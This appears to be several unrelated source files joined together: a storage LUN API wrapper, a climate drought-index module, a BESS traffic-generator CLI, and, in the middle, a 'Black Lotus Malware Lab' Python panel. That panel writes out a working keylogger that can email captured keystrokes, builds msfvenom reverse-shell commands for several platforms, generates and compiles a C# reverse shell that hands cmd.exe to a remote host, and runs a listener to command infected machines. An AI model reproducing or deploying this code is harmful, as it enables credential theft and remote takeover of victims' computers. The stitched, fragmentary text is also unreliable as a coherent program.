        return self._lungroup_export(container, name, initiators,
                                     ports, False)

    def unexport_lun_group(self, container, name, initiators, ports):
        """Unexports a LUN group.

        Arguments:
            container  -- string
            name       -- string
            initiators -- string (string or list)
            ports      -- string (string or list)

        Returns:
            Action result as a dict.

        """
        return self._lungroup_export(container, name, initiators,
                                     ports, True)

    def _lungroup_export(self, container, name, initiators, ports, unexport):
        """Internal work function for:

            export_lun_group
            unexport_lun_group

        """
        nodes = []
        nodes.append(XGNode('container', 'string', container))
        nodes.append(XGNode('name', 'string', name))
        nodes.extend(XGNode.as_node_list('initiators/{0}', 'string',
                                         initiators))
        nodes.extend(XGNode.as_node_list('ports/{0}', 'string', ports))
        nodes.append(XGNode('unexport', 'bool', unexport))

        return self._basic.perform_action('/vshare/actions/vdm' +
                                          '/lungroup/export', nodes)

    def create_lun(self, container, name, size, quantity, nozero,
                   thin, readonly, startnum, blksize=None, naca=None,
                   alua=None, preferredport=None):
        """Create a LUN.

        Arguments:
            container     -- string
            name          -- string
            size          -- string
            quantity      -- uint64
            nozero        -- string
            thin          -- string
            readonly      -- string
            startnum      -- uint64
            blksize       -- uint32 (optional)
            naca          -- bool (optional)
            alua          -- bool (optional)
            preferredport -- uint8 (optional)

        Returns:
            Action result as a dict.

        """
        nodes = []
        nodes.append(XGNode('container', 'string', container))
        nodes.append(XGNode('name', 'string', name))
        nodes.append(XGNode('size', 'string', size))
        nodes.append(XGNode('quantity', 'uint64', quantity))
        nodes.append(XGNode('nozero', 'string', nozero))
        nodes.append(XGNode('thin', 'string', thin))
        nodes.append(XGNode('readonly', 'string', readonly))
        nodes.append(XGNode('action', 'string', 'c'))
        nodes.append(XGNode('startnum', 'uint64', startnum))
        if blksize is not None:
            nodes.append(XGNode('blksize', 'uint32', blksize))
        if naca is not None:
            nodes.append(XGNode('naca', 'bool', naca))
        if alua is not None:
            nodes.append(XGNode('alua', 'bool', alua))
        if preferredport is not None:
            nodes.append(XGNode('preferredport', 'uint8', preferredport))

        return self._basic.perform_action('/vshare/actions' +
                                          '/lun/create', nodes)

    def resize_lun(self, container, name, size):
        """ Resize a LUN.

        Arguments:
            container -- string
            name      -- string
            size      -- string

        Returns:
            Action result as a dict.

        """
        nodes = []
        nodes.append(XGNode('container', 'string', container))
        nodes.append(XGNode('lun', 'string', name))
        nodes.append(XGNode('lun_new_size', 'string', size))

        return self._basic.perform_action('/vshare/actions' +
                                          '/lun/resize', nodes)

    def set(self, container, lun=None, read_only=None, port_A=None,
            port_B=None, devid=None, naca=None, alua=None,
            preferredport=None, encrypted=None, threshold_type=None,
            threshold_hard_val=None, threshold_soft_val=None):
        """Perform LUN modification.

        Arguments:
            container          -- string
            lun                -- string (optional)
            read_only          -- bool (optional)
            port_A             -- bool (optional)
            port_B             -- bool (optional)
            devid              -- string (optional)
            naca               -- bool (optional)
            alua               -- bool (optional)
            preferredport      -- uint8 (optional)
            encrypted          -- bool (optional)
            threshold_type     --
<reponame>haysengithub/climate_indices
import logging

import numba
import numpy as np
from enum import Enum

from climate_indices import compute, eto, palmer, utils

# declare the names that should be included in the public API for this module
__all__ = ["pdsi", "percentage_of_normal", "pet", "scpdsi", "spei", "spi"]


# ----------------------------------------------------------------------------------------------------------------------
class Distribution(Enum):
    """
    Enumeration type for distribution fittings used for SPI and SPEI.
    """

    pearson = "pearson"
    gamma = "gamma"


# ----------------------------------------------------------------------------------------------------------------------
# set up a basic, global _logger
logging.basicConfig(
    level=logging.DEBUG,
    format="%(asctime)s %(levelname)s %(message)s",
    datefmt="%Y-%m-%d %H:%M:%S",
)
_logger = logging.getLogger(__name__)

# ----------------------------------------------------------------------------------------------------------------------
# valid upper and lower bounds for indices that are fitted/transformed to a distribution (SPI and SPEI)
_FITTED_INDEX_VALID_MIN = -3.09
_FITTED_INDEX_VALID_MAX = 3.09


# ----------------------------------------------------------------------------------------------------------------------
# NOTE(review): a bare @numba.jit on functions that use Enum comparisons and
# logging will not compile in nopython mode — confirm the intended numba
# behavior (object-mode fallback is deprecated in recent numba versions).
@numba.jit
def spi(
    values,
    scale,
    distribution,
    data_start_year,
    calibration_year_initial,
    calibration_year_final,
    periodicity,
):
    """
    Computes SPI (Standardized Precipitation Index).

    :param values: 1-D numpy array of precipitation values, in any units,
        first value assumed to correspond to January of the initial year if
        the periodicity is monthly, or January 1st of the initial year if daily
    :param scale: number of time steps over which the values should be scaled
        before the index is computed
    :param distribution: distribution type to be used for the internal
        fitting/transform computation
    :param data_start_year: the initial year of the input precipitation dataset
    :param calibration_year_initial: initial year of the calibration period
    :param calibration_year_final: final year of the calibration period
    :param periodicity: the periodicity of the time series represented by the
        input data, valid/supported values are 'monthly' and 'daily'
        'monthly' indicates an array of monthly values, assumed to span full
        years, i.e. the first value corresponds to January of the initial year
        and any missing final months of the final year filled with NaN values,
        with size == # of years * 12
        'daily' indicates an array of full years of daily values with 366 days
        per year, as if each year were a leap year and any missing final months
        of the final year filled with NaN values, with array size == (# years * 366)
    :return SPI values fitted to the gamma distribution at the specified time
        step scale, unitless
    :rtype: 1-D numpy.ndarray of floats of the same length as the input array
        of precipitation values
    """

    # we expect to operate upon a 1-D array, so if we've been passed a 2-D array we flatten it, otherwise raise an error
    shape = values.shape
    if len(shape) == 2:
        values = values.flatten()
    elif len(shape) != 1:
        message = "Invalid shape of input array: {0} -- only 1-D and 2-D arrays are supported".format(
            shape
        )
        _logger.error(message)
        raise ValueError(message)

    # if we're passed all missing values then we can't compute anything, return the same array of missing values
    if (np.ma.is_masked(values) and values.mask.all()) or np.all(np.isnan(values)):
        return values

    # remember the original length of the array, in order to facilitate returning an array of the same size
    original_length = values.size

    # get a sliding sums array, with each time step's value scaled by the specified number of time steps
    values = compute.sum_to_scale(values, scale)

    # reshape precipitation values to (years, 12) for monthly, or to (years, 366) for daily
    if periodicity is compute.Periodicity.monthly:
        values = utils.reshape_to_2d(values, 12)
    elif periodicity is compute.Periodicity.daily:
        values = utils.reshape_to_2d(values, 366)
    else:
        raise ValueError("Invalid periodicity argument: %s" % periodicity)

    if distribution is Distribution.gamma:
        # fit the scaled values to a gamma distribution and transform to corresponding normalized sigmas
        values = compute.transform_fitted_gamma(
            values,
            data_start_year,
            calibration_year_initial,
            calibration_year_final,
            periodicity,
        )
    elif distribution is Distribution.pearson:
        # fit the scaled values to a Pearson Type III distribution and transform to corresponding normalized sigmas
        values = compute.transform_fitted_pearson(
            values,
            data_start_year,
            calibration_year_initial,
            calibration_year_final,
            periodicity,
        )
    else:
        message = "Unsupported distribution argument: {dist}".format(dist=distribution)
        _logger.error(message)
        raise ValueError(message)

    # clip values to within the valid range, reshape the array back to 1-D
    values = np.clip(values, _FITTED_INDEX_VALID_MIN, _FITTED_INDEX_VALID_MAX).flatten()

    # return the original size array
    return values[0:original_length]


# ----------------------------------------------------------------------------------------------------------------------
@numba.jit
def spei(
    precips_mm,
    pet_mm,
    scale,
    distribution,
    periodicity,
    data_start_year,
    calibration_year_initial,
    calibration_year_final,
):
    """
    Compute SPEI fitted to the gamma distribution.

    PET values are subtracted from the precipitation values to come up with an
    array of (P - PET) values, which is then scaled to the specified months
    scale and finally fitted/transformed to SPEI values corresponding to the
    input precipitation time series.

    :param precips_mm: an array of monthly total precipitation values, in
        millimeters, should be of the same size (and shape?) as the input
        temperature array
    :param pet_mm: an array of monthly PET values, in millimeters, should be
        of the same size (and shape?) as the input precipitation array
    :param scale: the number of months over which the values should be scaled
        before computing the indicator
    :param distribution: distribution type to be used for the internal
        fitting/transform computation
    :param periodicity: the periodicity of the time series represented by the
        input data, valid/supported values are 'monthly' and 'daily'
        'monthly' indicates an array of monthly values, assumed to span full
        years, i.e. the first value corresponds to January of the initial year
        and any missing final months of the final year filled with NaN values,
        with size == # of years * 12
        'daily' indicates an array of full years of daily values with 366 days
        per year, as if each year were a leap year and any missing final months
        of the final year filled with NaN values, with array size == (# years * 366)
    :param data_start_year: the initial year of the input datasets (assumes
        that the two inputs cover the same period)
    :param calibration_year_initial: initial year of the calibration period
    :param calibration_year_final: final year of the calibration period
    :return: an array of SPEI values
    :rtype: numpy.ndarray of type float, of the same size and shape as the
        input temperature and precipitation arrays
    """

    # if we're passed all missing values then we can't compute anything, return the same array of missing values
    if (np.ma.is_masked(precips_mm) and precips_mm.mask.all()) or np.all(
        np.isnan(precips_mm)
    ):
        return precips_mm

    # validate that the two input arrays are compatible
    if precips_mm.size != pet_mm.size:
        message = "Incompatible precipitation and PET arrays"
        _logger.error(message)
        raise ValueError(message)

    # subtract the PET from precipitation, adding an offset to ensure that all values are positive
    p_minus_pet = (precips_mm.flatten() - pet_mm.flatten()) + 1000.0

    # remember the original length of the input array, in order to facilitate returning an array of the same size
    original_length = precips_mm.size

    # get a sliding sums array, with each element's value scaled by the specified number of time steps
    scaled_values = compute.sum_to_scale(p_minus_pet, scale)

    if distribution is Distribution.gamma:
        # fit the scaled values to a gamma distribution and transform to corresponding normalized sigmas
        transformed_fitted_values = compute.transform_fitted_gamma(
            scaled_values,
            data_start_year,
            calibration_year_initial,
            calibration_year_final,
            periodicity,
        )
    elif distribution is Distribution.pearson:
        # fit the scaled values to a Pearson Type III distribution and transform to corresponding normalized sigmas
        transformed_fitted_values = compute.transform_fitted_pearson(
            scaled_values,
            data_start_year,
            calibration_year_initial,
            calibration_year_final,
            periodicity,
        )
    else:
        message = "Unsupported distribution argument: {dist}".format(dist=distribution)
        _logger.error(message)
        raise ValueError(message)

    # clip values to within the valid range, reshape the array back to 1-D
    values = np.clip(
        transformed_fitted_values, _FITTED_INDEX_VALID_MIN, _FITTED_INDEX_VALID_MAX
    ).flatten()

    # return the original size array
    return values[0:original_length]


# ----------------------------------------------------------------------------------------------------------------------
@numba.jit
def scpdsi(
    precip_time_series,
    pet_time_series,
    awc,
    data_start_year,
    calibration_start_year,
    calibration_end_year,
):
    """
    This function computes the self-calibrated Palmer Drought Severity Index
    (scPDSI), Palmer Drought Severity Index (PDSI), Palmer Hydrological
    Drought Index (PHDI), Palmer Modified Drought Index (PMDI), and
    Palmer Z-Index.

    :param precip_time_series: time series of precipitation values, in inches
    :param pet_time_series: time series of PET values, in inches
    :param awc: available water capacity (soil constant), in inches
    :param data_start_year: initial year of the input precipitation and PET
        datasets, both of which are assumed to start in January of this year
    :param calibration_start_year: initial year of the calibration period
    :param calibration_end_year: final year of the calibration period
    :return: five numpy arrays containing SCPDSI, PDSI, PHDI, PMDI, and
        Z-Index values respectively
    """
    # thin wrapper: all the work is delegated to the palmer module
    return palmer.scpdsi(
        precip_time_series,
        pet_time_series,
        awc,
        data_start_year,
        calibration_start_year,
        calibration_end_year,
    )


# ----------------------------------------------------------------------------------------------------------------------
@numba.jit
def pdsi(
    precip_time_series,
    pet_time_series,
    awc,
    data_start_year,
    calibration_start_year,
    calibration_end_year,
):
    """
    This function computes the Palmer Drought Severity Index (PDSI), Palmer
    Hydrological Drought Index (PHDI), and Palmer Z-Index.

    :param precip_time_series: time series of monthly precipitation
payload_location = "NOT SET" link_true_false="False" def help(): os.system('cls||clear') print("""\033[37m ============================== \033[31mMalware Lab Panel\033[37m ============================== \033[31mCore Commands\033[37m set payload 'number' Set the specific payload to generate, #Example: set payload 1 set lhost Set custom local ip that you want the payload to listen |_You can see your local ip by typing 'lhost' lhost Auto set lhost of your machine set lport Set the port that you want the payload to listen set name Set the payload name set location Set the location that the payload will be stored |_If you choose 'set location', you are not allowed to use link link (NON supported yet) Generate the payload as a link(only in local network) |_If you choose link, you are not allowed to use 'set location' config see the payload configuration listener start a listener compile Generate the payload command ( use 'config' to see your payload ) \033[31mMSF Payloads\033[37m (Use Metasploit to create \033[31mReverse Shell\033[37m payloads\033[37m) \033[31m[=============================================================>\033[37m [\033[31m1\033[37m]Android \033[33m|\033[37m [\033[31m2\033[37m]Linux \033[33m|\033[37m [\033[31m3\033[37m] Windows \033[33m|\033[37m [\033[31m4\033[37m] Mac OS X \033[33m|\033[37m [\033[31m5\033[37m] Python \033[33m|\033[37m [\033[31m6\033[37m] Bash \033[31mCustom Payloads \033[37m(You dont need msfvenom to create \033[31mReverse Shell\033[37m payloads\033[37m) \033[31m[=============================================================>\033[37m [\033[31m7\033[37m] Windows C# (undetectable) [\033[31m8\033[37m] Keylogger (Only requires email and password for your smtp gmail server) """) help() lab = True while lab: def keylogger(): email = input("\033[37mEmail > \033[31m") password = input("\033[37mPassword > \033[31m") name = input("\033[37mFile Name > \033[31m") code1 = (r""" import keyboard import smtplib from threading import Timer from datetime 
import datetime SEND_REPORT_EVERY = 20 """) email_1 = str("EMAIL_ADDRESS = '" + email + "' ") password_1 = str("EMAIL_PASSWORD = '" + password + "' ") code2 = str(r""" class Keylogger: def __init__(self, interval, report_method="email"): self.interval = interval self.report_method = report_method self.log = "" self.start_dt = datetime.now() self.end_dt = datetime.now() def callback(self, event): name = event.name if len(name) > 1: if name == "space": name = " " elif name == "enter": name = "[ENTER]\n" elif name == "decimal": name = "." else: name = name.replace(" ", "_") name = f"[{name.upper()}]" self.log += name def update_filename(self): start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "") end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "") self.filename = f"keylog-{start_dt_str}_{end_dt_str}" def report_to_file(self): with open(f"{self.filename}.txt", "w") as f: print(self.log, file=f) print(f"[+] Saved {self.filename}.txt") def sendmail(self, email, password, message): server = smtplib.SMTP(host="smtp.gmail.com", port=587) server.starttls() server.login(email, password) server.sendmail(email, email, message) server.quit() def report(self): if self.log: self.end_dt = datetime.now() self.update_filename() if self.report_method == "email": self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) elif self.report_method == "file": self.report_to_file() self.start_dt = datetime.now() self.log = "" timer = Timer(interval=self.interval, function=self.report) timer.daemon = True timer.start() def start(self): self.start_dt = datetime.now() keyboard.on_release(callback=self.callback) self.report() keyboard.wait() if __name__ == "__main__": keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="file") keylogger.start() """) code_mal = str(code1 + "\n" + email_1 + "\n" + password_1 + "\n" + code2) keylogger_rev=open(name + ".py","w+") keylogger_rev.write(code_mal) keylogger_rev.close() print(str("Malware ready: \033[31m" + 
name + ".py\033[37m")) file_name_byte = str(name +".py") file_stats = os.stat(file_name_byte) print("File size: ", file_stats.st_size, " bytes!") a = input("\033[31mBlack Lotus\033[37m(\033[31mMalware Lab\033[37m) \033[31m>\033[37m ") #-------------------------------------------------------------------------------------------------------------- # PAYLOADS #-------------------------------------------------------------------------------------------------------------- if a == "set payload 1": payload = 'android/meterpreter/reverse_tcp' print("\033[37mPayload => \033[31m", payload) payload_os = 'Android' payload_extension='apk' #android payload elif a == "set payload 2": payload = 'linux/x86/meterpreter/reverse_tcp' print("\033[37mPayload => \033[31m", payload) payload_os='Linux' payload_extension='elf' #linux payload elif a == "set payload 3": payload = 'windows/meterpreter/reverse_tcp' print("\033[37mPayload => \033[31m", payload) payload_os='Windows' payload_extension='exe' #windows payload elif a == "set payload 4": payload = 'osx/x86/shell_reverse_tcp' print("\033[37mPayload => \033[31m", payload) payload_os='Mac OS X' #MAC OS PAYLOAD elif a == "set payload 5": payload = 'cmd/unix/reverse_python' print("\033[37mPayload => \033[31m", payload) payload_os='Python' payload_extension='py' #Python payload elif a == "set payload 6": payload = 'cmd/unix/reverse_bash' print("\033[37mPayload => \033[31m", payload) payload_os='Bash' payload_extension='sh' #Bash Payload elif a == "set payload 7": payload = 'C# Reverse shell' print("\033[37mPayload => \033[31m", payload) payload_os='Windows' payload_extension='exe' # C# Payload elif a == "set payload 8": payload = 'Python Keylogger' print("\033[37mPayload => \033[31m", payload) payload_os='Windows/Linux' payload_extension='py' # Python Keylogger keylogger() #-------------------------------------------------------------------------------------------------------------- # CONFIG 
#-------------------------------------------------------------------------------------------------------------- elif a == "set lport": lport=input("\033[37mLPort > \033[31m") #local port elif a == "lhost": import socket import threading hostname = socket.gethostname() local_ip = socket.gethostbyname(hostname) print("\033[37mLHost: \033[31m", local_ip) elif a =="set lhost": local_ip=input("\033[37mLHost > \033[31m") elif a =="set name": payload_name=input("\033[37mName > \033[31m") elif a =="set location": payload_location=input("\033[37mDirectory > \033[31m") link_true_false="False" elif a =="link": #payload_location="/var/www/html/" #link_true_false="True" print("not supported yet") elif a == "config": print("\n\033[37m============================= \033[31mConfiguration\033[37m =============================") print("\n\033[31m>>>>>>>>>>>>>>>>>>>>") print("\033[37mPAYLOAD \033[31m> ", payload) print("\033[37mExtension \033[31m> ", payload_extension) print("\033[37mOS/SCRIPT \033[31m> ", payload_os) print("\033[37mLHost \033[31m> ", local_ip) print("\033[37mLPort \033[31m> ", lport) print("\033[37mName \033[31m> ", payload_name) print("\033[37mDirectory \033[31m> ", payload_location) print("\033[37mLink \033[31m> ", link_true_false) print("\033[31m>>>>>>>>>>>>>>>>>>>>\033[37m") print("\n") elif a == "compile": #msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf if payload == "android/meterpreter/reverse_tcp": print("\n\033[37mYour Payload is Ready:") print('\033[31msudo msfvenom -p ' + str(payload) + " LHOST=" + str(local_ip) + " LPORT=" + str(lport) + " R> " + str(payload_name) + "." 
+ str(payload_extension)) print("\n\033[37mUse this command to generate your payload") print("\033[37m(It requires msfvenom to be installed)") elif payload == "C# Reverse shell": def master(): code1 = (r""" using System; using System.Text; using System.IO; using System.Diagnostics; using System.ComponentModel; using System.Linq; using System.Net; using System.Net.Sockets; namespace ConnectBack { public class Program { static StreamWriter streamWriter; public static void Main(string[] args) {""") code2 = (r""" { using(Stream stream = client.GetStream()) { using(StreamReader rdr = new StreamReader(stream)) { streamWriter = new StreamWriter(stream); StringBuilder strInput = new StringBuilder(); Process p = new Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); //strInput.Append("\n"); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } } }""") lhost = local_ip one = str(""" " """) two = str(""" ", """) rev = (str(" using(TcpClient client = new TcpClient(" + one.strip() + lhost + two.strip() +" " + lport + "))")) name = payload_name malware_rev=open(name + ".cs","w+") #you can change the file name code_mal = str(code1 + "\n" + rev + "\n" + code2) malware_rev.write(code_mal) malware_rev.close() try: comp = (str("mcs -out:" + name + ".exe " + name + ".cs")) os.system(comp) except: 
os.system("sudo apt install mono-mcs") comp = (str("mcs -out:" + name + ".exe " + name + ".cs")) os.system(comp) print(str("Malware ready: \033[31m" + name + ".exe\033[37m")) file_name_byte = str(name +".exe") file_stats = os.stat(file_name_byte) print("File size: ", file_stats.st_size, " bytes!") master() else: print("\n\033[37mYour Payload is Ready:") print('\033[31msudo msfvenom -p ' + str(payload) + " LHOST=" + str(local_ip) + " LPORT=" + str(lport) + " -f " + str(payload_extension) + " > " + str(payload_name) + "." + str(payload_extension)) print("\n\033[37mUse this command to generate your payload") print("\033[37m(It requires msfvenom to be installed)") elif a == "help": help() elif a =="exit": lab = False mallab = False else: print("' " + str(a) + " '", "is not recognized as internal or external command") print("Type help to reveal the panel") elif b =="exit": mallab = False else: print("' " + str(b) + " '", "is not recognized as internal or external command") #---------------------------------------------------------------------------------------------------------------------- def reverse_server(): print("The payload is located in the same directory of Black-Lotus in the name of 'backdoor.py'") print("Open and edit it for use. 
Manual included in it's source code") import socket HOST = input("\n\033[37mServer LHost \033[31m>\033[37m ") # Add the ip of your machine to connect PORT = int(input("\033[37mServer LPort \033[31m>\033[37m ")) # Add the port you want it to listen server = socket.socket() server.bind((HOST, PORT)) print('\n\033[37m[\033[31m+\033[37m] Database connected') print('\033[37m[\033[31m+\033[37m] Initialising target ..') print('\033[37m[\033[31m+\033[37m] Grab a coffe, Waiting for an incoming connection ...') server.listen(1) client, client_addr = server.accept() print('\033[37m[\033[31m+\033[37m] WE HAVE A SHELL!!') print("\n\033[37m[\033[31m+\033[37m] Target '", client_addr, "' connected sucessfully") while True: command = input("\n\033[37mBlack Lotus(\033[31mRemote/shell\033[37m) \033[31m>\033[37m") command = command.encode() client.send(command) print('\n\033[37m[\033[31m*\033[37m] Command sent', command ) output = client.recv(1024) output = output.decode() print(f"Output: {output}") #---------------------------------------------------------------------------------------------------------------------- def computer_diagnostics(): import os try: import psutil except: os.system("pip3 install psutil") import psutil import platform from datetime import datetime import time def get_size(bytes, suffix="B"): """ Scale bytes to its proper format e.g: 1253656 => '1.20MB' 1253656678 => '1.17GB' """ factor = 1024 for unit
import collections
import copy
import datetime
import errno
import fcntl
import fnmatch
import glob
import inspect
import json
import multiprocessing
import os
import os.path
import pprint
import re
from ruamel.yaml import YAML
import scapy.all as scapy
import signal
import socket
import subprocess
import sys
import tempfile
import time
import traceback

import commands as bess_commands
from pybess.module import *
from generator.common import *
import generator.modes

# Pool of CPU cores available for traffic-generation workers.
available_cores = list(range(multiprocessing.cpu_count()))
# Per-port extra PMD arguments, keyed by port identifier.
ports = dict()

DEFAULT_STATS_CSV = '/tmp/bench.csv'
# Destination of the per-second stats rows; changed via "set csv CSV".
stats_csv = DEFAULT_STATS_CSV


def load_json_config(conf_path):
    """Parse *conf_path* as JSON and return the resulting object."""
    with open(conf_path, 'r') as f:
        # BUGFIX: json.load() takes a file object; the original passed
        # f.read() (a str), which raises TypeError on every call.
        return json.load(f)


def load_yaml_config(conf_path):
    """Parse *conf_path* as YAML (safe loader) and return the result."""
    yaml = YAML(typ='safe')
    with open(conf_path, 'r') as f:
        return yaml.load(f.read())


def load_config(conf_path):
    """Load a JSON or YAML config file, guessing the format from the name.

    Falls back to trying JSON first, then YAML, when the extension is
    unrecognized.
    """
    # Try to guess config format from file name.
    _, ext = os.path.splitext(conf_path)
    # BUGFIX: os.path.splitext returns the extension WITH the leading dot
    # ('.json'), so the original comparisons against 'json'/'yaml' never
    # matched and every load went through the blind fallback below.
    if ext.lower() == '.json':
        return load_json_config(conf_path)
    if ext.lower() in ('.yaml', '.yml'):
        return load_yaml_config(conf_path)
    # Fall back onto json by default, then yaml.
    try:
        return load_json_config(conf_path)
    except Exception:
        return load_yaml_config(conf_path)


def get_var_attrs(cli, var_token, partial_word):
    """Return (type, description, completion candidates) for a CLI
    command-syntax variable token, or None for unknown tokens.

    Network/API errors while computing candidates are tolerated: a broken
    connection disconnects the bess handle, API errors are ignored.
    """
    var_type = None
    var_desc = ''
    var_candidates = []
    try:
        if var_token == 'ENABLE_DISABLE':
            var_type = 'endis'
            var_desc = 'one or more worker IDs'
            var_candidates = ['enable', 'disable']
        elif var_token == '[BESSD_OPTS...]':
            var_type = 'opts'
            var_desc = 'bess daemon command-line options (see "bessd -h")'
        elif var_token == 'MODE':
            var_type = 'name'
            var_desc = 'which type of traffic to generate'
            try:
                var_candidates = ['flowgen', 'udp', 'http']
            except Exception:
                pass
        elif var_token == 'PORT':
            var_type = 'name'
            var_desc = 'a port identifier'
        elif var_token == 'PORT...':
            var_type = 'name+'
            var_desc = 'a port identifier'
        elif var_token == '[TRAFFIC_SPEC...]':
            var_type = 'map'
        elif var_token == 'CSV':
            var_type = 'filename'
            var_desc = 'a path to a csv file'
        elif var_token == 'CONF_FILE':
            var_type = 'filename'
            var_desc = 'configuration filename'
            var_candidates = bess_commands.complete_filename(partial_word)
        elif var_token == '[PORT_ARGS...]':
            var_type = 'map'
            var_desc = 'initial configuration for port'
    except socket.error as e:
        if e.errno in [errno.ECONNRESET, errno.EPIPE]:
            cli.bess.disconnect()
        else:
            raise
    except cli.bess.APIError:
        pass
    if var_type is None:
        return None
    else:
        return var_type, var_desc, var_candidates


# Return (head, tail)
# head: consumed string portion
# tail: the rest of input line
# You can assume that 'line == head + tail'
def split_var(cli, var_type, line):
    """Split one variable of *var_type* off the front of *line*."""
    if var_type in ['name', 'filename', 'endis', 'int']:
        # Single-token types: consume up to the first space.
        pos = line.find(' ')
        if pos == -1:
            head = line
            tail = ''
        else:
            head = line[:pos]
            tail = line[pos:]
    elif var_type in ['wid+', 'name+', 'map', 'pyobj', 'opts']:
        # Greedy types: consume the whole remainder.
        head = line
        tail = ''
    else:
        raise cli.InternalError('type "%s" is undefined', var_type)
    return head, tail


def _parse_map(**kwargs):
    # Helper for bind_var's 'map' type: lets "key=val, key=val" be parsed
    # with Python's own keyword-argument syntax.
    return kwargs


# Return (mapped_value, tail)
# mapped_value: Python value/object from the consumed token(s)
# tail: the rest of input line
def bind_var(cli, var_type, line):
    """Consume and validate one variable of *var_type* from *line*.

    Raises cli.BindError when the token does not fit the type.
    """
    head, remainder = split_var(cli, var_type, line)

    # default behavior
    val = head

    if var_type == 'endis':
        if 'enable'.startswith(val):
            val = 'enable'
        elif 'disable'.startswith(val):
            val = 'disable'
        else:
            raise cli.BindError('"endis" must be either "enable" or "disable"')
    elif var_type == 'name':
        if re.match(r'^[_a-zA-Z][\w]*$', val) is None:
            raise cli.BindError('"name" must be [_a-zA-Z][_a-zA-Z0-9]*')
    elif var_type == 'name+':
        val = sorted(list(set(head.split())))  # collect unique items
        for name in val:
            if re.match(r'^[_a-zA-Z][\w]*$', name) is None:
                raise cli.BindError('"name" must be [_a-zA-Z][_a-zA-Z0-9]*')
    elif var_type == 'filename':
        if val.find('\0') >= 0:
            raise cli.BindError('Invalid filename')
    elif var_type == 'map':
        try:
            # SECURITY NOTE(review): eval() on operator-typed CLI input;
            # acceptable for a local admin tool, but do not expose remotely.
            val = eval('_parse_map(%s)' % head)
        except Exception:
            raise cli.BindError('"map" should be "key=val, key=val, ..."')
    elif var_type == 'pyobj':
        try:
            if head.strip() == '':
                val = None
            else:
                # SECURITY NOTE(review): see eval() note above.
                val = eval(head)
        except Exception:
            raise cli.BindError(
                '"pyobj" should be an object in python syntax'
                ' (e.g., 42, "foo", ["hello", "world"], {"bar": "baz"})')
    elif var_type == 'opts':
        val = val.split()
    elif var_type == 'int':
        try:
            val = int(val)
        except Exception:
            raise cli.BindError('Expected an integer')

    return val, remainder


# bessctl commands re-exported into this tool's command list.
bessctl_cmds = [
    'monitor pipeline',
]

cmdlist = list(filter(lambda x: x[0] in bessctl_cmds, bess_commands.cmdlist))


def cmd(syntax, desc=''):
    """Decorator that registers a CLI command (syntax, description, func).

    Note: the decorator intentionally returns None for the decorated name;
    commands are only ever invoked through `cmdlist`.
    """
    def cmd_decorator(func):
        cmdlist.append((syntax, desc, func))
    return cmd_decorator


@cmd('help', 'List available commands')
def help(cli):
    for syntax, desc, _ in cmdlist:
        cli.fout.write('  %-50s%s\n' % (syntax, desc))


def _show_config(cli, port):
    """Print one port's mode and traffic spec, framed by a divider."""
    sess = cli.get_session(port)
    cli.fout.write('Port %s\n' % (port,))
    divider = '-' * (4 + len(port)) + '\n'
    cli.fout.write(divider)
    cli.fout.write('mode: %23s\n' % (sess.mode(),))
    cli.fout.write(str(sess.spec()) + '\n')
    cli.fout.write(divider)


def _show_configs(cli, ports):
    # BUGFIX: the original computed sorted(list(set(ports))) and threw the
    # result away; bind it so ports are actually deduplicated and sorted.
    ports = sorted(set(ports))
    for port in ports:
        _show_config(cli, port)


@cmd('show config', 'Show the current confiugration of all ports')
def show_config_all(cli):
    _show_configs(cli, cli.ports())


@cmd('show config PORT...', 'Show the current confiugration of a port')
def show_config_all(cli, ports):
    # NOTE(review): this deliberately reuses the name show_config_all; the
    # module-level binding is unused (cmd() registers each func and returns
    # None), so the shadowing is harmless.
    _show_configs(cli, ports)


def _do_reset(cli):
    """Stop all ports, then pause/reset/resume the bess daemon."""
    for port in cli.ports():
        _stop(cli, port)
    with cli.bess_lock:
        cli.bess.pause_all()
        cli.bess.reset_all()
        cli.bess.resume_all()


@cmd('reset', 'Reset trafficgen')
def reset(cli):
    bess_commands.warn(cli, 'Going to reset everything.', _do_reset)


# One row of per-second port statistics (rates and latency percentiles).
PortRate = collections.namedtuple('PortRate',
                                  ['inc_packets', 'inc_dropped', 'inc_bytes',
                                   'rtt_avg', 'rtt_med', 'rtt_99',
                                   'jitter_avg', 'jitter_med', 'jitter_99',
                                   'out_packets', 'out_dropped', 'out_bytes'])


def _monitor_ports(cli, *ports):
    """Print per-second traffic/latency stats for *ports* (all ports when
    none given) until interrupted with CTRL+C; also appends rows to the
    stats CSV file.
    """
    global stats_csv

    def get_delta(old, new):
        # Convert two absolute-stat snapshots into per-second rates;
        # RTT/jitter fields are averaged rather than differenced.
        sec_diff = new['timestamp'] - old['timestamp']
        return PortRate(
            inc_packets=(new['inc_packets'] - old['inc_packets']) / sec_diff,
            inc_dropped=(new['inc_dropped'] - old['inc_dropped']) / sec_diff,
            inc_bytes=(new['inc_bytes'] - old['inc_bytes']) / sec_diff,
            rtt_avg=(new['rtt_avg'] + old['rtt_avg']) / 2,
            rtt_med=(new['rtt_med'] + old['rtt_med']) / 2,
            rtt_99=(new['rtt_99'] + old['rtt_99']) / 2,
            jitter_avg=(new['jitter_avg'] + old['jitter_avg']) / 2,
            jitter_med=(new['jitter_med'] + old['jitter_med']) / 2,
            jitter_99=(new['jitter_99'] + old['jitter_99']) / 2,
            out_packets=(new['out_packets'] - old['out_packets']) / sec_diff,
            out_dropped=(new['out_dropped'] - old['out_dropped']) / sec_diff,
